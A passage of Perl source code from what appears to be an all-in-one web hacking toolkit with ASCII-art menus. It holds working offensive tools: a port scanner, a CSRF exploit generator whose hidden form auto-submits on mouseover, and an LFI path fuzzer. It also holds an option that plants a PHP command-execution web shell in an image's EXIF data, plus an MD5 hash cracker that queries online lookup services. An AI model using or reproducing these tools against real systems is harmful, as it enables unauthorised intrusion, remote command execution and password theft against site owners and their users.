2281 | printear( "\n[+] Result : " . ascii($texto) . "\n", "text", "13", "5" ); | |
2282 | adios(); | |
2283 | ||
2284 | } | |
2285 | elsif ( $op eq "5" ) { | |
2286 | ||
2287 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2288 | printear( | |
2289 | "\n[+] Result : " . ascii_de( $texto . "\n" ), "text", | |
2290 | "13", "5" | |
2291 | ); | |
2292 | adios(); | |
2293 | ||
2294 | } | |
2295 | elsif ( $op eq "6" ) { | |
2296 | ||
2297 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2298 | printear( "\n[+] Result : " . encode($texto) . "\n", "text", "13", | |
2299 | "5" ); | |
2300 | adios(); | |
2301 | ||
2302 | } | |
2303 | elsif ( $op eq "7" ) { | |
2304 | ||
2305 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2306 | printear( "\n[+] Result : " . decode($texto) . "\n", "text", "13", | |
2307 | "5" ); | |
2308 | adios(); | |
2309 | ||
2310 | } | |
2311 | elsif ( $op eq "8" ) { | |
2312 | ||
2313 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2314 | printear( | |
2315 | "\n[+] Result : " . uri_escape($texto) . "\n", "text", | |
2316 | "13", "5" | |
2317 | ); | |
2318 | adios(); | |
2319 | ||
2320 | } | |
2321 | elsif ( $op eq "9" ) { | |
2322 | ||
2323 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2324 | printear( | |
2325 | "\n[+] Result : " . uri_unescape($texto) . "\n", "text", | |
2326 | "13", "5" | |
2327 | ); | |
2328 | adios(); | |
2329 | ||
2330 | } | |
2331 | elsif ( $op eq "10" ) { | |
2332 | ||
2333 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2334 | printear( | |
2335 | "\n[+] Result : " . unpack( "B*", $texto ) . "\n", "text", | |
2336 | "13", "5" | |
2337 | ); | |
2338 | adios(); | |
2339 | ||
2340 | } | |
2341 | elsif ( $op eq "11" ) { | |
2342 | ||
2343 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2344 | printear( | |
2345 | "\n[+] Result : " . pack( "B*", $texto ) . "\n", "text", | |
2346 | "13", "5" | |
2347 | ); | |
2348 | adios(); | |
2349 | ||
2350 | } | |
2351 | elsif ( $op eq "12" ) { | |
2352 | adios(); | |
2353 | } | |
2354 | else { | |
2355 | adios(); | |
2356 | } | |
2357 | ||
2358 | } | |
2359 | ||
2360 | sub head_portscanner { | |
2361 | printear( " | |
2362 | ||
2363 | @@@@@ @@@@ @@@@@ @@@@@ @@@ @@@@ @ @ @ | |
2364 | @ @ @ @ @ @ @ @ @ @ @ @ @@ @ | |
2365 | @ @ @ @ @ @ @ @ @ @ @ @@ @ | |
2366 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2367 | @@@@@ @ @ @@@@@ @ @@@ @ @ @ @ @ @ | |
2368 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2369 | @ @ @ @ @ @ @ @ @@@@@ @ @@ | |
2370 | @ @ @ @ @ @ @ @ @ @@ @ @ @@ | |
2371 | @ @@@@ @ @ @ @@@ @@@@ @ @ @ @ | |
2372 | ||
2373 | ", "logos", "7", "5" ); | |
2374 | ||
2375 | } | |
2376 | ||
2377 | sub portscanner { | |
2378 | ||
2379 | clean(); | |
2380 | head_portscanner(); | |
2381 | ||
2382 | printear( " | |
2383 | [++] Options | |
2384 | ||
2385 | [+] 1 : Simple Scan | |
2386 | [+] 2 : Full Scan | |
2387 | [+] 3 : Exit | |
2388 | ||
2389 | ", "text", "13", "5" ); | |
2390 | ||
2391 | my $op = printear( "[+] Option : ", "stdin", "11", "13" ); | |
2392 | ||
2393 | if ( $op eq "1" ) { | |
2394 | ||
2395 | my %ports = ( | |
2396 | "21" => "ftp", | |
2397 | "22" => "ssh", | |
2398 | "25" => "smtp", | |
2399 | "80" => "http", | |
2400 | "110" => "pop3", | |
2401 | "3306" => "mysql" | |
2402 | ); | |
2403 | ||
2404 | my $ip = printear( "\n[+] IP : ", "stdin", "11", "13" ); | |
2405 | ||
2406 | printear( "\n[+] Scanning $ip ...\n\n", "text", "13", "5" ); | |
2407 | ||
2408 | for my $port ( keys %ports ) { | |
2409 | ||
2410 | if ( | |
2411 | new IO::Socket::INET( | |
2412 | PeerAddr => $ip, | |
2413 | PeerPort => $port, | |
2414 | Proto => "tcp", | |
2415 | Timeout => 0.5 | |
2416 | ) | |
2417 | ) | |
2418 | { | |
2419 | printear( | |
2420 | "[Port] : " | |
2421 | . $port | |
2422 | . " [Service] : " | |
2423 | . $ports{$port} . "\n", | |
2424 | "text", "7", "5" | |
2425 | ); | |
2426 | } | |
2427 | } | |
2428 | ||
2429 | printear( "\n[+] Finished\n", "text", "13", "5" ); | |
2430 | ||
2431 | adios(); | |
2432 | ||
2433 | } | |
2434 | ||
2435 | elsif ( $op eq "2" ) { | |
2436 | ||
2437 | my $ip = printear( "\n[+] IP : ", "stdin", "11", "13" ); | |
2438 | my $start = printear( "\n[+] Start Port : ", "stdin", "11", "13" ); | |
2439 | my $end = printear( "\n[+] End Port : ", "stdin", "11", "13" ); | |
2440 | ||
2441 | printear( "\n[+] Scanning $ip ...\n\n", "text", "13", "5" ); | |
2442 | ||
2443 | for my $port ( $start .. $end ) { | |
2444 | if ( | |
2445 | new IO::Socket::INET( | |
2446 | Timeout => 0.5, | |
2447 | PeerAddr => $ip, | |
2448 | PeerPort => $port, | |
2449 | Proto => "tcp", | |
2450 | Timeout => 0.5 | |
2451 | ) | |
2452 | ) | |
2453 | { | |
2454 | printear( "[+] Port Found : " . $port . "\n", "text", "7", | |
2455 | "5" ); | |
2456 | } | |
2457 | } | |
2458 | printear( "\n[+] Scan Finished\n", "text", "13", "5" ); | |
2459 | ||
2460 | adios(); | |
2461 | } | |
2462 | ||
2463 | elsif ( $op eq "3" ) { | |
2464 | adios(); | |
2465 | } | |
2466 | else { | |
2467 | adios(); | |
2468 | } | |
2469 | ||
2470 | } | |
2471 | ||
2472 | sub head_httpfinger { | |
2473 | printear( " | |
2474 | ||
2475 | @ @ @@@@@ @@@@@ @@@@@ @@@@@ @ @ @ @@@@ @@@@@ @@@@@ | |
2476 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ | |
2477 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ | |
2478 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2479 | @@@@@@ @ @ @@@@@ @@@@ @ @ @ @ @ @@@ @@@@ @@@@@ | |
2480 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2481 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ | |
2482 | @ @ @ @ @ @ @ @ @@ @ @@ @ @ @ | |
2483 | @ @ @ @ @ @ @ @ @ @@@ @ @@@@@ @ @ | |
2484 | ||
2485 | ", "logos", "7", "5" ); | |
2486 | ||
2487 | } | |
2488 | ||
2489 | sub httpfinger { | |
2490 | ||
2491 | clean(); | |
2492 | head_httpfinger(); | |
2493 | ||
2494 | printear( " | |
2495 | [++] Options | |
2496 | ||
2497 | [+] 1 : Simple Scan | |
2498 | [+] 2 : Full Scan | |
2499 | [+] 3 : Exit | |
2500 | ||
2501 | ", "text", "13", "5" ); | |
2502 | ||
2503 | my $op = printear( "[+] Option : ", "stdin", "11", "13" ); | |
2504 | ||
2505 | if ( $op eq "1" ) { | |
2506 | ||
2507 | my $page = printear( "\n[+] Page : ", "stdin", "11", "13" ); | |
2508 | ||
2509 | printear( "\n[+] Getting Data ...\n", "text", "13", "5" ); | |
2510 | ||
2511 | my $code = $nave->get($page); | |
2512 | ||
2513 | printear( "\n[+] Date : " . $code->header('date'), "text", "13", "5" ); | |
2514 | printear( "\n[+] Server : " . $code->header('server'), | |
2515 | "text", "13", "5" ); | |
2516 | printear( "\n[+] Connection : " . $code->header('connection'), | |
2517 | "text", "13", "5" ); | |
2518 | printear( "\n[+] Content-Type : " . $code->header('content-type'), | |
2519 | "text", "13", "5" ); | |
2520 | ||
2521 | printear( "\n\n[+] Finished\n", "text", "13", "5" ); | |
2522 | ||
2523 | adios(); | |
2524 | ||
2525 | } | |
2526 | elsif ( $op eq "2" ) { | |
2527 | ||
2528 | my $page = printear( "\n[+] Page : ", "stdin", "11", "13" ); | |
2529 | ||
2530 | printear( "\n[+] Getting Data ...\n", "text", "13", "5" ); | |
2531 | ||
2532 | my $code = $nave->get($page); | |
2533 | ||
2534 | printear( "\n" . $code->headers()->as_string(), "text", "13", "5" ); | |
2535 | ||
2536 | printear( "\n[+] Finished\n", "text", "13", "5" ); | |
2537 | ||
2538 | adios(); | |
2539 | ||
2540 | } | |
2541 | elsif ( $op eq "3" ) { | |
2542 | } | |
2543 | else { | |
2544 | adios(); | |
2545 | } | |
2546 | ||
2547 | } | |
2548 | ||
2549 | sub csrf_scan { | |
2550 | ||
2551 | clean(); | |
2552 | head_csrf(); | |
2553 | ||
2554 | my $archivo_html = printear( "[+] File HTML : ", "stdin", "11", "13" ); | |
2555 | my $resultado = printear( "\n[+] SaveFile : ", "stdin", "11", "13" ); | |
2556 | ||
2557 | unless ( -f $archivo_html ) { | |
2558 | printear( "\n[-] File Not Found\n", "text", "5", "5" ); | |
2559 | adios(); | |
2560 | } | |
2561 | ||
2562 | printear( "\n[+] File to parse : " . $archivo_html . "\n", | |
2563 | "text", "13", "5" ); | |
2564 | ||
2565 | open( FILE, $archivo_html ); | |
2566 | my $words = join q(), <FILE>; | |
2567 | close(FILE); | |
2568 | ||
2569 | my @testar = HTML::Form->parse( $words, "/" ); | |
2570 | ||
2571 | $count = 0; | |
2572 | foreach my $test (@testar) { | |
2573 | $count++; | |
2574 | printear( "\n -- == Form $count == --\n\n", "text", "13", "5" ); | |
2575 | if ( $test->attr(name) eq "" ) { | |
2576 | printear( "[+] Name : No Found" . "\n", "text", "13", "5" ); | |
2577 | } | |
2578 | else { | |
2579 | printear( "[+] Name : " . $test->attr(name) . "\n", | |
2580 | "text", "13", "5" ); | |
2581 | } | |
2582 | printear( "[+] Action : " . $test->action . "\n", "text", "13", "5" ); | |
2583 | printear( "[+] Method : " . $test->method . "\n", "text", "13", "5" ); | |
2584 | printear( "\n-- == Input == --\n\n", "text", "13", "5" ); | |
2585 | @inputs = $test->inputs; | |
2586 | printear( "Type\t\tName\t\tValue\n", "text", "13", "5" ); | |
2587 | foreach $in (@inputs) { | |
2588 | printear( $in->type . "\t\t", "text", "13", "5" ); | |
2589 | printear( $in->name . "\t\t", "text", "13", "5" ); | |
2590 | printear( $in->value . "\t\t\n", "text", "13", "5" ); | |
2591 | } | |
2592 | } | |
2593 | ||
2594 | my $op = printear( "\n\n[+] Form to generate : ", "stdin", "11", "13" ); | |
2595 | ||
2596 | if ( $op ne "" ) { | |
2597 | $op--; | |
2598 | my $probar = ( HTML::Form->parse( $words, "/" ) )[$op]; | |
2599 | ||
2600 | my $action = ver( $words, $op ); | |
2601 | my $fin = nombre($action) . ".html"; | |
2602 | savefile( | |
2603 | "csrf/" . $resultado, | |
2604 | "<form action=$action method=" . $probar->method . " name=exploit>" | |
2605 | ); | |
2606 | @input = $probar->inputs; | |
2607 | foreach $in (@input) { | |
2608 | ||
2609 | my $val = printear( | |
2610 | "\n[+] Value of the " . $in->name . " : ", "stdin", | |
2611 | "11", "13" | |
2612 | ); | |
2613 | ||
2614 | savefile( | |
2615 | "csrf/" . $resultado, | |
2616 | "<input type=hidden name=" . $in->name . " value=" . $val . ">" | |
2617 | ); | |
2618 | } | |
2619 | my $final = | |
2620 | "</form><script language=javascript>function colocar(){document.exploit.submit()} | |
2621 | </script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()> | |
2622 | "; | |
2623 | savefile( "csrf/" . $resultado, $final ); | |
2624 | printear( "\n[+] CSRF Exploit Generated\n", "text", "13", "5" ); | |
2625 | } | |
2626 | ||
2627 | adios(); | |
2628 | ||
2629 | } | |
2630 | ||
2631 | sub ver { | |
2632 | my $probar = ( HTML::Form->parse( $_[0], "/" ) )[ $_[1] ]; | |
2633 | my $action = $probar->action; | |
2634 | my $co = $action; | |
2635 | if ( $action eq "" or $action eq "/" ) { | |
2636 | my $action = printear( "\n[+] Action : ", "stdin", "11", "13" ); | |
2637 | return $action; | |
2638 | } | |
2639 | else { | |
2640 | return $co; | |
2641 | } | |
2642 | ||
2643 | } | |
2644 | ||
2645 | sub head_csrf { | |
2646 | printear( " | |
2647 | ||
2648 | @@@@ @@@ @@@@@ @@@@@ @@@@@ @@@@ @@@@ @ | |
2649 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2650 | @ @ @ @ @ @ @ @ @ @ @ | |
2651 | @ @ @ @ @ @ @ @ @ @ @ | |
2652 | @ @@@ @@@@@ @@@@ @ @ @ @ @ @ | |
2653 | @ @ @ @ @ @ @ @ @ @ @ | |
2654 | @ @ @ @ @ @ @ @ @ @ @ | |
2655 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2656 | @@@@ @@@ @ @ @ @ @@@@ @@@@ @@@@@ | |
2657 | ||
2658 | ||
2659 | ||
2660 | ", "logos", "7", "5" ); | |
2661 | } | |
2662 | ||
2663 | sub lfi_scan { | |
2664 | ||
2665 | clean(); | |
2666 | head_lfi(); | |
2667 | ||
2668 | printear( " | |
2669 | [++] Options | |
2670 | ||
2671 | [+] 1 : Scan Page | |
2672 | [+] 2 : Generate Image Infected | |
2673 | [+] 3 : Exit | |
2674 | ||
2675 | ", "text", "13", "5" ); | |
2676 | ||
2677 | my $op = printear( "[+] Option : ", "stdin", "11", "13" ); | |
2678 | ||
2679 | if ( $op eq "1" ) { | |
2680 | ||
2681 | my $page = printear( "\n[+] Page : ", "stdin", "11", "13" ); | |
2682 | ||
2683 | printear( "\n[+] Scanning ...\n", "text", "13", "5" ); | |
2684 | ||
2685 | $code = toma( $page . "'" ); | |
2686 | if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ig | |
2687 | or $code =~ | |
2688 | /No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig ) | |
2689 | { | |
2690 | printear( "[+] Vulnerable !\n", "text", "13", "5" ); | |
2691 | printear( | |
2692 | "[*] Full path discloure detected : $1\n", "text", | |
2693 | "13", "5" | |
2694 | ); | |
2695 | printear( "\n[+] Status : [fuzzing files]\n\n", "text", "13", "5" ); | |
2696 | for my $file (@files) { | |
2697 | $code1 = toma( $page . $file ); | |
2698 | unless ( $code1 =~ | |
2699 | /No such file or directory in <b>(.*)<\/b> on line/ig | |
2700 | or $code =~ | |
2701 | /No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig | |
2702 | ) | |
2703 | { | |
2704 | $ok = 1; | |
2705 | printear( | |
2706 | "[File Found] : " . $page . $file . "\n", "text", | |
2707 | "7", "5" | |
2708 | ); | |
2709 | savefile( "lfi_logs.txt", $page . $file ); | |
2710 | } | |
2711 | } | |
2712 | unless ( $ok == 1 ) { | |
2713 | printear( "\n[-] Dont found any file\n", "text", "5", "5" ); | |
2714 | } | |
2715 | } | |
2716 | else { | |
2717 | printear( "\n[-] Page not vulnerable to LFI\n", "text", "5", "5" ); | |
2718 | } | |
2719 | ||
2720 | adios(); | |
2721 | ||
2722 | } | |
2723 | ||
2724 | elsif ( $op eq "2" ) { | |
2725 | ||
2726 | my $image = printear( "\n[+] Image : ", "stdin", "11", "13" ); | |
2727 | ||
2728 | my $poc = Image::ExifTool->new(); | |
2729 | ||
2730 | $poc->ExtractInfo($image); | |
2731 | $poc->SetNewValue( "Model", '<?php system($_GET["cmd"]);exit(1); ?>' ); | |
2732 | ||
2733 | if ( $poc->WriteInfo($image) ) { | |
2734 | printear( "\n[+] Enjoy this photo\n", "text", "7", "5" ); | |
2735 | } | |
2736 | else { | |
2737 | printear( "\n[-] Error\n", "text", "5", "5" ); | |
2738 | } | |
2739 | ||
2740 | adios(); | |
2741 | ||
2742 | } | |
2743 | elsif ( $op eq "3" ) { | |
2744 | adios(); | |
2745 | } | |
2746 | else { | |
2747 | adios(); | |
2748 | } | |
2749 | ||
2750 | } | |
2751 | ||
2752 | sub head_lfi { | |
2753 | printear( " | |
2754 | ||
2755 | ### ######## ##### ## ## ### | |
2756 | # # # # # # # # # # # # | |
2757 | # # # # # # # # # | |
2758 | # ### # # # # # # # | |
2759 | # # # # # # # # # | |
2760 | # # # # # # # # # | |
2761 | ######## ### ### ## ## ##### | |
2762 | ||
2763 | ", "logos", "7", "5" ); | |
2764 | } | |
2765 | ||
2766 | sub menu_crackhash { | |
2767 | ||
2768 | head_crackhash(); | |
2769 | ||
2770 | my $op = printear( "[+] Option : ", "stdin", "11", "13" ); | |
2771 | ||
2772 | if ( $op eq "1" ) { | |
2773 | my $ha = printear( "\n[+] Hash : ", "stdin", "11", "13" ); | |
2774 | if ( ver_length($ha) ) { | |
2775 | printear( "\n[+] Cracking Hash...\n", "text", "13", "5" ); | |
2776 | my $re = crackit($ha); | |
2777 | unless ( $re =~ /false01/ ) { | |
2778 | printear( "\n[+] Cracked : $re\n", "text", "7", "5" ); | |
2779 | savefile( "hashes-found.txt", $ha . ":" . $re ); | |
2780 | } | |
2781 | else { | |
2782 | printear( "\n[-] Not Found\n\n", "text", "5", "5" ); | |
2783 | } | |
2784 | } | |
2785 | else { | |
2786 | printear( "\n[-] Hash invalid\n", "text", "5", "5" ); | |
2787 | } | |
2788 | printear( "\n[+] Press the enter key to return to main menu\n", | |
2789 | "text", "13", "5" ); | |
2790 | <stdin>; | |
2791 | menu_crackhash(); | |
2792 | } | |
2793 | if ( $op eq "2" ) { | |
2794 | my $fi = printear( "\n[+] Wordlist : ", "stdin", "11", "13" ); | |
2795 | if ( -f $fi ) { | |
2796 | printear( "\n[+] Opening File\n", "text", "13", "5" ); | |
2797 | open( WORD, $fi ); | |
2798 | my @varios = <WORD>; | |
2799 | close WORD; | |
2800 | my @varios = repes(@varios); | |
2801 | printear( "\n[+] Hashes Found : " . int(@varios), | |
2802 | "text", "13", "5" ); | |
2803 | printear( "\n\n[+] Cracking hashes...\n\n", "text", "13", "5" ); | |
2804 | for $hash (@varios) { | |
2805 | chomp $hash; | |
2806 | if ( ver_length($hash) ) { | |
2807 | my $re = crackit($hash); | |
2808 | unless ( $re =~ /false01/ ) { | |
2809 | printear( "[+] $hash : $re\n", "text", "7", "5" ); | |
2810 | savefile( "hashes-found.txt", $hash . ":" . $re ); | |
2811 | } | |
2812 | } | |
2813 | } | |
2814 | } | |
2815 | else { | |
2816 | printear( "\n[-] File Not Found\n", "text", "5", "5" ); | |
2817 | } | |
2818 | printear( "\n[+] Press the enter key to return to main menu\n", | |
2819 | "text", "13", "5" ); | |
2820 | <stdin>; | |
2821 | menu_crackhash(); | |
2822 | } | |
2823 | if ( $op eq "3" ) { | |
2824 | adios(); | |
2825 | } | |
2826 | } | |
2827 | ||
2828 | sub crackit { | |
2829 | ||
2830 | my $md5 = shift; | |
2831 | my $resultado; | |
2832 | ||
2833 | ## www.md5.net | |
2834 | ||
2835 | my $code = tomar( | |
2836 | "http://www.md5.net/cracker.php", | |
2837 | { 'hash' => $md5, 'submit' => 'Crack' } | |
2838 | ); | |
2839 | ||
2840 | if ( $code =~ m{<input type="text" id="hash" size="(.*?)" value="(.*?)"/>} | |
2841 | and $code !~ /Entry not found./mig ) | |
2842 | { | |
2843 | ||
2844 | $resultado = $2; | |
2845 | ||
2846 | } | |
2847 | else { | |
2848 | ||
2849 | ## md5online.net | |
2850 | ||
2851 | my $code = tomar( "http://md5online.net/index.php", | |
2852 | { 'pass' => $md5, 'option' => 'hash2text', 'send' => 'Submit' } ); | |
2853 | ||
2854 | if ( $code =~ | |
2855 | /<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>/ ) | |
2856 | { | |
2857 | $resultado = $2; | |
2858 | } | |
2859 | else { | |
2860 | ||
2861 | ## md5decryption.com | |
2862 | ||
2863 | my $code = tomar( | |
2864 | "http://md5decryption.com/index.php", | |
2865 | { 'hash' => $md5, 'submit' => 'Decrypt It!' } | |
2866 | ); | |
2867 | ||
2868 | if ( $code =~ /Decrypted Text: <\/b>(.*?)<\/font>/ ) { | |
2869 | $resultado = $1; | |
2870 | } | |
2871 | else { | |
2872 | ||
2873 | ## md5.my-addr.com | |
2874 | ||
2875 | my $code = tomar( | |
2876 | "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php", | |
2877 | { 'md5' => $md5 } | |
2878 | ); | |
2879 | ||
2880 | if ( $code =~ | |
2881 | /<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/ | |
2882 | ) | |
2883 | { | |
2884 | $resultado = $1; | |
2885 | } | |
2886 | else { | |
2887 | $resultado = "false01"; | |
2888 | } | |
2889 | } | |
2890 | } | |
2891 | } | |
2892 | return $resultado; | |
2893 | } | |
2894 | ||
2895 | sub head_crackhash { | |
2896 | clean(); | |
2897 | printear( " | |
2898 | ||
2899 | ||
2900 | ########## ######### ######### ##### # ### ### | |
2901 | # # # ## # # # # # # # # # # # # # # | |
2902 | # # ## # # # # # # # # # # # # | |
2903 | ### # # # # # # ### ### ### # # ## ## | |
2904 | # # # # # # # # # # # ##### # # | |
2905 | # # # ## # # # # # # # # # # # # # | |
2906 | ### ###### # ##### ######## # ### ### ###### ### | |
2907 | ||
2908 | ||
2909 | ||
2910 | ", "logos", "7", "5" ); | |
2911 | printear( " | |
2912 | [++] Options | |
2913 | ||
2914 | [+] 1 : Hash | |
2915 | [+] 2 : File with hashes | |
2916 | [+] 3 : Exit | |
2917 | ||
2918 | ", "text", "13", "5" ); | |
2919 | } ## | |
2920 | ||
2921 | sub load_locateip { | |
2922 | ||
2923 | head_locateip(); | |
2924 | my $page = printear( "[+] Page : ", "stdin", "11", "13" ); | |
2925 | if ( $page eq "exit" ) { | |
2926 | estoydentroporahora(); | |
2927 | } | |
2928 | infocon($page); | |
2929 | adios(); | |
2930 | ||
2931 | sub head_locateip { | |
2932 | clean(); | |
2933 | printear( " | |
2934 | ||
2935 | ||
2936 | ||
2937 | @ @@@@ @@@@ @ @@@@@ @@@@@ @ @@@@@ | |
2938 | @ @ @ @ @ @ @ @ @ @ @ | |
2939 | @ @ @ @ @ @ @ @ @ @ @ | |
2940 | @ @ @ @ @ @ @ @ @ @ @ | |
2941 | @ @ @ @ @ @ @ @@@@ @ @@@@@ | |
2942 | @ @ @ @ @ @ @ @ @ @ | |
2943 | @ @ @ @ @@@@@ @ @ @ @ | |
2944 | @ @ @ @ @@ @ @ @ @ @ | |
2945 | @@@@@ @@@@ @@@@ @ @ @ @@@@@ @ @ | |
2946 | ||
2947 | ||
2948 | ||
2949 | ", "logos", "7", "5" ); | |
2950 | } | |
2951 | ||
2952 | sub infocon { | |
2953 | my $target = shift; | |
2954 | ||
2955 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($target); | |
2956 | ||
2957 | if ( $auth ne "" ) { | |
2958 | ||
2959 | my $get = gethostbyname($auth); | |
2960 | my $target = inet_ntoa($get); | |
2961 | ||
2962 | printear( "\n[+] Getting info\n\n", "text", "13", "5" ); | |
2963 | ||
2964 | $total = | |
2965 | "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target"; | |
2966 | $re = toma($total); | |
2967 | ||
2968 | if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) { | |
2969 | printear( "[+] City : $2\n", "text", "7", "5" ); | |
2970 | } | |
2971 | else { | |
2972 | printear( "[-] Not Found\n", "text", "5", "5" ); | |
2973 | adios(); | |
2974 | } | |
2975 | if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) { | |
2976 | printear( "[+] Country : $2\n", "text", "7", "5" ); | |
2977 | } | |
2978 | if ( $re =~ | |
2979 | /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) | |
2980 | { | |
2981 | printear( "[+] State or Region : $2\n", "text", "7", "5" ); | |
2982 | } | |
2983 | ||
2984 | printear( "\n[+] Getting Hosts\n\n", "text", "13", "5" ); | |
2985 | ||
2986 | my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target ); | |
2987 | ||
2988 | while ( $code =~ /whois\/(.*?)\">Whois/g ) { | |
2989 | my $dns = $1; | |
2990 | chomp $dns; | |
2991 | printear( "[DNS] : $dns\n", "text", "7", "5" ); | |
2992 | } | |
2993 | } | |
2994 | } | |
2995 | ||
2996 | } ## | |
2997 | ||
2998 | ## | |
2999 | ||
3000 | sub load_findpaths { | |
3001 | ||
3002 | head_paths(); | |
3003 | my $web = printear( "[+] Web : ", "stdin", "11", "13" ); | |
3004 | ||
3005 | if ( $web eq "exit" ) { | |
3006 | estoydentroporahora(); | |
3007 | } | |
3008 | ||
3009 | printear( "\n[+] Scan Type\n", "text", "5", "5" ); | |
3010 | printear( "\n[+] 1 : Fast\n", "text", "13", "5" ); | |
3011 | printear( "[+] 2 : Full\n", "text", "13", "5" ); | |
3012 | printear( "[+] 3 : Exit\n", "text", "13", "5" ); | |
3013 | my $op = printear( "\n[+] Option : ", "stdin", "11", "13" ); | |
3014 | ||
3015 | if ( $op eq "3" ) { | |
3016 | estoydentroporahora(); | |
3017 | } | |
3018 | ||
3019 | printear( "\n[+] Scanning ....\n\n", "text", "13", "5" ); | |
3020 | ||
3021 | if ( $op eq "1" ) { | |
3022 | simple($web); | |
3023 | } | |
3024 | elsif ( $op eq "2" ) { | |
3025 | escalar($web); | |
3026 | } | |
3027 | else { | |
3028 | simplex($web); | |
3029 | } | |
3030 | adios(); | |
3031 | ||
3032 | sub escalar { | |
3033 | ||
3034 | my $co = $_[0]; | |
3035 | my $code = toma( $_[0] ); | |
3036 | my @links = get_links($code); | |
3037 | ||
3038 | if ( $code =~ /Index of (.*)/ig ) { | |
3039 | printear( "[+] Link : $co\n", "text", "7", "5" ); | |
3040 | savefile( "paths-logs.txt", $co ); | |
3041 | my $dir_found = $1; | |
3042 | chomp $dir_found; | |
3043 | while ( $code =~ /<a href=\"(.*)\">(.*)<\/a>/ig ) { | |
3044 | my $ruta = $1; | |
3045 | my $nombre = $2; | |
3046 | unless ( $nombre =~ /Parent Directory/ig | |
3047 | or $nombre =~ /Description/ig ) | |
3048 | { | |
3049 | push( @encontrados, $_[0] . "/" . $nombre ); | |
3050 | } | |
3051 | } | |
3052 | } | |
3053 | ||
3054 | for my $com (@links) { | |
3055 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); | |
3056 | if ( $path =~ /\/(.*)$/ ) { | |
3057 | my $path1 = $1; | |
3058 | $_[0] =~ s/$path1//ig; | |
3059 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); | |
3060 | if ( $path =~ /(.*)\// ) { | |
3061 | my $parche = $1; | |
3062 | unless ( $repetidos =~ /$parche/ ) { | |
3063 | $repetidos .= " " . $parche; | |
3064 | my $yeah = "http://" . $auth . $parche; | |
3065 | escalar($yeah); | |
3066 | } | |
3067 | } | |
3068 | for (@encontrados) { | |
3069 | escalar($_); | |
3070 | } | |
3071 | } | |
3072 | } | |
3073 | } | |
3074 | ||
3075 | sub simplex { | |
3076 | ||
3077 | my $code = toma( $_[0] ); | |
3078 | my @links = get_links($code); | |
3079 | ||
3080 | for my $com (@links) { | |
3081 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); | |
3082 | if ( $path =~ /\/(.*)$/ ) { | |
3083 | my $path1 = $1; | |
3084 | $_[0] =~ s/$path1//ig; | |
3085 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); | |
3086 | if ( $path =~ /(.*)\// ) { | |
3087 | my $parche = $1; | |
3088 | unless ( $repetidos =~ /$parche/ ) { | |
3089 | $repetidos .= " " . $parche; | |
3090 | my $code = toma( "http://" . $auth . $parche ); | |
3091 | ||
3092 | if ( $code =~ /Index of (.*)</ig ) { | |
3093 | my $dir_found = $1; | |
3094 | chomp $dir_found; | |
3095 | my $yeah = "http://" . $auth . $parche; | |
3096 | printear( "[+] Link : $yeah\n", "text", "7", "5" ); | |
3097 | savefile( "paths-logs.txt", $yeah ); | |
3098 | } | |
3099 | } | |
3100 | } | |
3101 | } | |
3102 | } | |
3103 | } | |
3104 | ||
3105 | sub head_paths { | |
3106 | clean(); | |
3107 | printear( " | |
3108 | ||
3109 | ||
3110 | @@@@@ @ @ @@@@@ @ | |
3111 | @ @ @ @ @ @ | |
3112 | @ @ @ @ @ @ | |
3113 | @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @ @@ @@ | |
3114 | @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @@ @ @ @ | |
3115 | @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @ @ @ | |
3116 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3117 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3118 | @ @ @ @ @@@@ @@@ @ @ @@@@ @ @ @ @@ | |
3119 | ||
3120 | ||
3121 | ||
3122 | ||
3123 | ||
3124 | ", "logos", "7", "5" ); | |
3125 | } | |
3126 | ||
3127 | } ## | |
3128 | ||
3129 | sub load_fsd { | |
3130 | ||
3131 | head_fsd(); | |
3132 | ||
3133 | my $page = printear( "[+] Page : ", "stdin", "11", "13" ); | |
3134 | ||
3135 | if ( $page eq "exit" ) { | |
3136 | estoydentroporahora(); | |
3137 | } | |
3138 | ||
3139 | ver_now_now($page); | |
3140 | ||
3141 | adios(); | |
3142 | ||
3143 | sub ver_now_now { | |
3144 | ||
3145 | my $page = $_[0]; | |
3146 | my $archivo; | |
3147 | ||
3148 | if ( $page =~ /(.*)\/(.*)\?/ ) { | |
